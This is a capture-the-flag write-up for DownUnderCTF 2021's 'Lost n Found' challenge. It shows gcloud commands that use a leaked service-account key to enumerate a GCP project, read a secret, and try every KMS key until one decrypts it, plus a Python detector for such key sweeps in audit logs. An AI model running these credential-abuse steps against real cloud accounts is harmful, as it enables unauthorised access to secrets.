# writeup  
Write up for the `Lost n Found` challenge

## Enumeration #1

Start by examining the attached file `legacy.json`. It contains credentials
for a GCP service account:  
* service account: `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com`  
* project id: `ductf-lost-n-found`

Using the commands below, we can log in to the GCP project `ductf-lost-n-found`:

```bash  
gcloud auth activate-service-account --key-file=legacy.json  
gcloud config set project ductf-lost-n-found  
```

## Enumeration #2

The next step is to check every resource this service account can use. We
used the `gcloud` CLI for this enumeration and tried to list resources for all
possible parameters. Most of the APIs in GCP were disabled, but...

After enumeration we can see that only the `secrets` and `kms` APIs are enabled
in the `ductf-lost-n-found` project, and the service account
`legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com` has access to
these resources.

## Enumeration #3

Based on the `Enumeration #2` research, we can extract the secret to the
`secret_enc` file and save the list of all available keys.

```bash  
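# List the secrets visible to the service account
gcloud secrets list
# Fetch the latest version of the secret and base64-decode it into secret_enc
gcloud secrets versions access latest --secret="unused_data" | base64 -d > secret_enc
gcloud kms keyrings list --location australia-southeast2 # we know the CTF is played in Australia
# Save the short names of all keys in the key ring to the `keys` file
gcloud kms keys list --keyring projects/ductf-lost-n-found/locations/australia-southeast2/keyRings/wardens-locks | tail -n +2 | awk '{ print $1 }' | sed 's/^.*cryptoKeys\///g' > keys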
```

## Check the final flag

Now we have the `keys` file with the list of all available keys and the
`secret_enc` file with the secret in encrypted form, so we can try each of the
keys in turn to decrypt the secret.
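Seen from the defender's side, trying every key in a key ring against one ciphertext leaves a recognisable trail: a single principal issuing `Decrypt` calls against many distinct keys, most of them failing. The sketch below is an added example, not part of the original writeup; it assumes Cloud KMS Data Access audit logs are enabled and exported as one JSON entry per line, and the sample records, project name, principals and `min_keys` threshold are all constructed for illustration.

```python
import json
from collections import defaultdict

# Constructed sample (not real logs): one audit entry per line, trimmed to the
# AuditLog fields used below. Project, key ring and principals are placeholders.
RING = "projects/example-project/locations/australia-southeast2/keyRings/example-ring"

def _entry(principal, key, code=0):
    return json.dumps({"protoPayload": {
        "serviceName": "cloudkms.googleapis.com",
        "methodName": "Decrypt",
        "authenticationInfo": {"principalEmail": principal},
        "resourceName": f"{RING}/cryptoKeys/{key}",
        "status": {"code": code} if code else {},  # 3 = INVALID_ARGUMENT
    }})

SAMPLE_LOG = (
    # A credential walking the key ring: five failures, one success on key-4.
    [_entry("legacy@example-project.iam.gserviceaccount.com", f"key-{i}", 0 if i == 4 else 3)
     for i in range(6)]
    # A normal workload: repeated successful decrypts with its single key.
    + [_entry("app@example-project.iam.gserviceaccount.com", "key-0") for _ in range(5)]
)

def find_key_sweeps(lines, min_keys=4):
    """Map principal -> {"keys", "failed"} for Decrypt callers that touched
    at least min_keys distinct keys (min_keys is an assumed threshold)."""
    keys, failed = defaultdict(set), defaultdict(int)
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or truncated export lines
        payload = entry.get("protoPayload", {}) if isinstance(entry, dict) else {}
        if payload.get("serviceName") != "cloudkms.googleapis.com":
            continue
        if not payload.get("methodName", "").endswith("Decrypt"):
            continue
        who = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
        # Collapse key versions onto their parent key before counting.
        keys[who].add(payload.get("resourceName", "").split("/cryptoKeyVersions/")[0])
        if payload.get("status", {}).get("code", 0) != 0:
            failed[who] += 1
    return {w: {"keys": len(k), "failed": failed[w]}
            for w, k in keys.items() if len(k) >= min_keys}

if __name__ == "__main__":
    print(find_key_sweeps(SAMPLE_LOG))
```

A service account that only ever needs one key should never appear in this output, which also argues for granting `decrypt` on the individual key rather than on the whole key ring.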

```bash
# Try each key name from the `keys` file against the encrypted secret
while read -r line; do
  gcloud kms decrypt --key "$line" --ciphertext-file=secret_enc --plaintext-file=secret_dec --location australia-southeast2 --keyring=wardens-locks
done < keys
```

Original writeup
(https://github.com/flusive/writeups/blob/main/DownUnderCTF2021/Lost-n-Found/writeup.md).